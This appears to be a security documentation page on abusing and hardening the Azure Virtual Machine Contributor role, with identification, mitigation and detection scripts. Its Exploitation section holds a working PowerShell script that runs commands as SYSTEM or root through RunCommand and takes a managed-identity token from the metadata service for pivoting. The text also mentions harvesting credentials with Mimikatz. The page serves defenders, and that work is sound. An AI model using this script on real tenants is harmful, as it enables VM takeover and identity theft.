
# AZ\_VM\_CONTRIBUTOR

## Summary

|                               |                                                                                                                                                                               |
| ----------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**       | AZ\_VM\_CONTRIBUTOR                                                                                                                                                           |
| **Azure Alias**               | Virtual Machine Contributor (Azure RBAC)                                                                                                                                      |
| **Affected Object Types**     | Virtual Machines, VM Scale Sets                                                                                                                                               |
| **Exploitation Certainty**    | Certain                                                                                                                                                                       |
| **Azure RBAC Role**           | Virtual Machine Contributor (`9980e02c-c2be-4d73-94e8-173b1dc7cf3c`) — manage VMs but not access to them or the virtual network/storage they are connected to                 |
| **Azure RBAC Role (Classic)** | Classic Virtual Machine Contributor (`d73bb868-a0df-4d4d-bd69-98a00b01fccb`) — manage classic VMs but not access to them or the virtual network/storage they are connected to |

## Description

`AZ_VM_CONTRIBUTOR` represents an Azure Resource Manager role assignment of the built-in **Virtual Machine Contributor** role (`9980e02c-c2be-4d73-94e8-173b1dc7cf3c`). The **Classic Virtual Machine Contributor** role (`d73bb868-a0df-4d4d-bd69-98a00b01fccb`) provides the equivalent access for classic (Azure Service Manager) VMs and carries the same abuse potential; the classic VM deployment model has been retired, but the role definition still exists and any remaining assignments should be treated the same way.

This role grants nearly every abusable privilege on Virtual Machines and VM Scale Sets (its Actions include `Microsoft.Compute/virtualMachines/*` and `Microsoft.Compute/virtualMachineScaleSets/*`), including:

* **Run commands** inside the guest through the RunCommand API (`Microsoft.Compute/virtualMachines/runCommand/action`); the command runs as `NT AUTHORITY\SYSTEM` on Windows and as `root` on Linux.
* **Manage VM configuration**: start, stop, restart, redeploy, resize, delete.
* **Manage extensions**: install the Custom Script Extension (`Microsoft.Compute/virtualMachines/extensions/write`), which executes arbitrary code with the same privileges as RunCommand.
* **Manage disks**: create, attach, detach and delete managed disks (`Microsoft.Compute/disks/read`, `write` and `delete`), which lets the holder detach a data disk from one VM in scope and attach it to a VM they already control.

Despite the role description ("not access to them or the virtual network/storage they are connected to"), the definition also includes `Microsoft.Storage/storageAccounts/listKeys/action`, so the holder can retrieve the access keys of every storage account in scope.

The most critical abuse vector is guest code execution as SYSTEM (Windows) or root (Linux), which enables:

* Full compromise of the VM operating system.
* Credential harvesting from memory (Mimikatz, LSASS dumps) on Windows, and of SSH keys and cached secrets on Linux.
* Lateral movement into on-premises infrastructure when the VM is domain-joined.
* Theft of managed identity tokens from the Instance Metadata Service (`http://169.254.169.254/metadata/identity/oauth2/token`), which can then be replayed against Azure Resource Manager, Key Vault, Storage or any other resource the VM's identity is granted.

## Identification

### PowerShell (Az Module)

```powershell
Connect-AzAccount

# List all Virtual Machine Contributor role assignments
Get-AzRoleAssignment -RoleDefinitionName "Virtual Machine Contributor" |
    Select-Object DisplayName, SignInName, ObjectType, Scope |
    Format-Table -AutoSize

# List Classic Virtual Machine Contributor role assignments
Get-AzRoleAssignment -RoleDefinitionName "Classic Virtual Machine Contributor" |
    Select-Object DisplayName, SignInName, ObjectType, Scope |
    Format-Table -AutoSize

# List VM Contributor at a specific scope
Get-AzRoleAssignment -RoleDefinitionName "Virtual Machine Contributor" `
    -Scope "/subscriptions/<SubscriptionId>/resourceGroups/<RGName>" |
    Select-Object DisplayName, SignInName, ObjectType, Scope |
    Format-Table -AutoSize
```

### Azure GUI

1. Open **Azure Portal** → navigate to the target **Virtual Machine**.
2. Go to **Access control (IAM)** → **Role assignments**.
3. Filter by **Role = Virtual Machine Contributor** or **Classic Virtual Machine Contributor**.
4. Review all principals listed, including those inherited from the resource group, subscription and management group scopes.

## Exploitation

A holder of Virtual Machine Contributor can fully abuse every VM in scope through RunCommand execution, extension deployment and managed identity token theft. See the following edges for the specific exploitation techniques:

> **Related Attack Paths:**
>
> * [AZ\_EXECUTE\_COMMAND](https://docs.forestall.io/fsprotect/edges/azure/az_execute_command) — Run commands as SYSTEM on VMs via RunCommand API, steal managed identity tokens.
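
The following Az PowerShell script is an added example and is not part of the original page or of the FSProtect tooling. It runs a script through the RunCommand API (`Invoke-AzVMRunCommand`, which needs exactly the `runCommand/action` permission this role grants) and has the guest request a managed identity token from IMDS. `<RGName>` and `<VMName>` are placeholders; the token request only returns a token if the VM has a system- or user-assigned managed identity, and the caller must already be signed in as the principal holding the role.

```powershell
# Added example: guest code execution and managed-identity token retrieval via the
# RunCommand API, using the Az module. <RGName> and <VMName> are placeholders.
$rg = '<RGName>'
$vm = '<VMName>'

# Pick the built-in command id from the OS type of the target VM.
$vmObj   = Get-AzVM -ResourceGroupName $rg -Name $vm
$isLinux = $vmObj.StorageProfile.OsDisk.OsType -eq 'Linux'

# Guest-side scripts. RunCommand executes them as NT AUTHORITY\SYSTEM (Windows) or root (Linux).
# The IMDS call returns a token for the VM's managed identity; it fails if none is assigned.
$windowsScript = @'
whoami
$t = Invoke-RestMethod -Headers @{ Metadata = 'true' } -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F'
$t | ConvertTo-Json -Compress
'@

$linuxScript = @'
id
curl -s -H 'Metadata: true' 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F'
'@

if ($isLinux) { $commandId = 'RunShellScript';      $body = $linuxScript;   $ext = 'sh'  }
else          { $commandId = 'RunPowerShellScript'; $body = $windowsScript; $ext = 'ps1' }

# Invoke-AzVMRunCommand reads the script from a file.
$scriptPath = Join-Path ([IO.Path]::GetTempPath()) "runcmd-$([guid]::NewGuid()).$ext"
Set-Content -Path $scriptPath -Value $body -Encoding ascii

try {
    $result = Invoke-AzVMRunCommand -ResourceGroupName $rg -VMName $vm `
        -CommandId $commandId -ScriptPath $scriptPath
}
finally {
    Remove-Item $scriptPath -Force -ErrorAction SilentlyContinue
}

# Value[0] carries stdout, Value[1] stderr; the action API truncates output to the last 4096 bytes.
$stdout = $result.Value[0].Message
$stderr = $result.Value[1].Message
Write-Host $stdout
if ($stderr) { Write-Warning $stderr }

# The last stdout line is the IMDS JSON when a managed identity is present.
$lastLine = ($stdout.Trim() -split "`n")[-1].Trim()
if ($lastLine -like '{*') {
    $token = $lastLine | ConvertFrom-Json
    Write-Host ("Got ARM token for client_id {0}, expires_on {1}" -f $token.client_id, $token.expires_on)
    # Pivot with the stolen token from the attacker's own session (AccountId is only a label):
    # Connect-AzAccount -AccessToken $token.access_token -AccountId $token.client_id
}
else {
    Write-Warning 'No IMDS token in output: the VM probably has no managed identity.'
}
```

The same flow works against scale set instances with `Invoke-AzVmssVMRunCommand`. Nothing in the script touches the VM's credentials or network path: the only requirement is the role assignment, which is why the edge is rated as certain.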

## Mitigation

1. **Minimize Virtual Machine Contributor assignments**
   * Go to **Azure Portal** → target VM → **Access control (IAM)** → **Role assignments**.
   * Remove any principal that does not need to manage VMs; check the resource group, subscription and management group scopes as well, since assignments there are inherited by every VM below them.
   * Use **Virtual Machine User Login** or **Virtual Machine Administrator Login** (Microsoft Entra login over RDP/SSH) when the requirement is to log on to the guest rather than to manage the resource, and **Reader** when visibility is all that is needed.
2. **Use PIM for just-in-time access**
   * Configure eligible assignments with activation approval and a short maximum activation time instead of permanent active ones; apply the same treatment to any Classic Virtual Machine Contributor assignments.
3. **Remove the code-execution paths from the role**
   * Azure Policy `deny` evaluates resource create and update requests, so it can block the deployment of `Microsoft.Compute/virtualMachines/runCommands` (managed run commands) and `Microsoft.Compute/virtualMachines/extensions` resources, but it cannot block the POST-based `Microsoft.Compute/virtualMachines/runCommand/action`.
   * To take that action away, assign a custom role cloned from Virtual Machine Contributor whose `NotActions` exclude `runCommand/action`, `runCommands/write` and `extensions/write`, and reserve the built-in role for the few principals that genuinely need guest code execution.
4. **Limit what a stolen managed identity token is worth**
   * Grant VM managed identities only the permissions their workload needs; whoever can run commands on the VM inherits every permission of its identity.
5. **Enable endpoint protection**
   * Deploy Microsoft Defender for Endpoint or equivalent EDR on all VMs; RunCommand and Custom Script Extension payloads execute on the host and are visible to it.
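
The following Az PowerShell script is an added example, not part of the original page or of FSProtect, showing how to build the custom role described in step 3: it clones Virtual Machine Contributor and carves the guest code-execution operations out of the wildcard Actions through `NotActions`. `<SubscriptionId>` is a placeholder, the role name is an arbitrary choice, and the caller needs permission to create role definitions (for example Owner or User Access Administrator on the subscription).

```powershell
# Added example: a custom role that keeps VM lifecycle management but removes
# RunCommand, managed run commands and extension deployment. <SubscriptionId> is a placeholder.
$subscriptionId = '<SubscriptionId>'

$role = Get-AzRoleDefinition -Name 'Virtual Machine Contributor'
$role.Id          = $null      # New-AzRoleDefinition assigns a fresh GUID
$role.IsCustom    = $true
$role.Name        = 'VM Lifecycle Operator (no guest execution)'
$role.Description = 'Virtual Machine Contributor without RunCommand and extension deployment.'

# NotActions subtract from the wildcard Actions (Microsoft.Compute/virtualMachines/* etc.).
$denied = @(
    'Microsoft.Compute/virtualMachines/runCommand/action',
    'Microsoft.Compute/virtualMachines/runCommands/write',
    'Microsoft.Compute/virtualMachines/extensions/write',
    'Microsoft.Compute/virtualMachineScaleSets/extensions/write',
    'Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action'
)

# Sanity check against the provider's published operations before creating the role,
# so a typo surfaces here rather than as a silently ineffective NotAction.
$known = (Get-AzProviderOperation 'Microsoft.Compute/*').Operation
foreach ($op in $denied) {
    if ($op -notin $known) { Write-Warning "Operation not published by the provider: $op" }
    if (-not $role.NotActions.Contains($op)) { $role.NotActions.Add($op) }
}

# Optional: the built-in role also lists storage account key retrieval explicitly.
# Drop it unless the operators genuinely need boot-diagnostics access to unmanaged storage.
$role.Actions.Remove('Microsoft.Storage/storageAccounts/listKeys/action') | Out-Null

$role.AssignableScopes.Clear()
$role.AssignableScopes.Add("/subscriptions/$subscriptionId")

$newRole = New-AzRoleDefinition -Role $role
$newRole | Select-Object Name, Id, NotActions | Format-List

# Move an operator from the built-in role to the custom one (object id is a placeholder):
# New-AzRoleAssignment -ObjectId '<PrincipalObjectId>' -RoleDefinitionName $newRole.Name `
#     -Scope "/subscriptions/$subscriptionId/resourceGroups/<RGName>"
# Remove-AzRoleAssignment -ObjectId '<PrincipalObjectId>' -RoleDefinitionName 'Virtual Machine Contributor' `
#     -Scope "/subscriptions/$subscriptionId/resourceGroups/<RGName>"
```

`NotActions` only narrows this role; a principal that also holds another assignment granting the excluded operations keeps them, so re-run the identification queries after the migration.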

## Detection

Monitor RunCommand executions and VM management operations in the Activity Log.

* Go to **Azure Portal** → **Monitor** → **Activity log**.
* Filter by **Operation name**. The portal lists display names, so select **Run Command on Virtual Machine** (`Microsoft.Compute/virtualMachines/runCommand/action`) together with the entries for `Microsoft.Compute/virtualMachines/runCommands/write` (managed run commands) and `Microsoft.Compute/virtualMachines/extensions/write` (extension installs); the raw value is shown as `operationName.value` in each event's JSON.
* Alert on:
  * RunCommand invocations from identities that are not the expected administrators or automation principals.
  * Custom Script Extension installations.
  * VM actions outside change management windows.
* The Activity Log records the caller, target VM and outcome, not the script body. Keep guest-side evidence by forwarding VM logs and EDR telemetry, and send the Activity Log to a Log Analytics workspace, since the portal retains only 90 days.
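
The following Az PowerShell script is an added example, not part of the original page or of FSProtect, that implements the first alert rule above as a scheduled query over the Activity Log: it collects every RunCommand invocation and extension write in the current subscription context over the last seven days, collapses the Started/Succeeded pairs by correlation id, and flags callers that are not on an allow list. The allow list entries and the seven-day window are assumptions to adapt.

```powershell
# Added example: hunt the Activity Log for guest code execution by unexpected principals.
# Assumes the Az context is set to the subscription of interest.

# Operations that give code execution in the guest.
$watchedActions = @(
    'Microsoft.Compute/virtualMachines/runCommand/action',
    'Microsoft.Compute/virtualMachines/runCommands/write',
    'Microsoft.Compute/virtualMachines/extensions/write',
    'Microsoft.Compute/virtualMachineScaleSets/extensions/write',
    'Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action'
)

# Principals expected to run commands (placeholders: a patching automation account and a
# service principal object id). Everything else is flagged for review.
$allowedCallers = @(
    'vm-patching@contoso.example',
    '00000000-0000-0000-0000-000000000000'
)

function Get-UnexpectedGuestExecution {
    param(
        [int]$LookbackDays = 7,
        [string[]]$Actions = $watchedActions,
        [string[]]$Allowed = $allowedCallers
    )

    $events = Get-AzActivityLog -StartTime (Get-Date).AddDays(-$LookbackDays) -EndTime (Get-Date) -DetailedOutput |
        Where-Object { $_.Authorization -and ($_.Authorization.Action -in $Actions) }

    # Each operation produces several events (Started, Succeeded/Failed) sharing a CorrelationId;
    # keep the earliest per correlation id so one invocation yields one row.
    $events |
        Group-Object CorrelationId |
        ForEach-Object { $_.Group | Sort-Object EventTimestamp | Select-Object -First 1 } |
        Select-Object EventTimestamp, Caller,
            @{ n = 'Action';     e = { $_.Authorization.Action } },
            @{ n = 'ResourceId'; e = { $_.ResourceId } },
            @{ n = 'Flag';       e = { if ($_.Caller -in $Allowed) { '' } else { 'REVIEW' } } } |
        Sort-Object EventTimestamp -Descending
}

$findings = Get-UnexpectedGuestExecution
$findings | Format-Table -AutoSize

# Exit non-zero when something needs review, so the script can drive a scheduled job or pipeline gate.
$flagged = @($findings | Where-Object { $_.Flag -eq 'REVIEW' })
if ($flagged.Count -gt 0) {
    Write-Warning ("{0} guest-execution event(s) from unexpected principals" -f $flagged.Count)
    exit 1
}
```

For the script contents themselves, collect them from the guest: the RunCommand extension leaves downloaded scripts under `C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows` on Windows and `/var/lib/waagent/run-command/download` on Linux, and EDR process telemetry shows what the script went on to execute.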

## References

* <https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor>
* <https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#classic-virtual-machine-contributor>
* <https://blog.netspi.com/running-powershell-scripts-on-azure-vms/>
* <https://powerzure.readthedocs.io/en/latest/Functions/operational.html#invoke-azureruncommand>
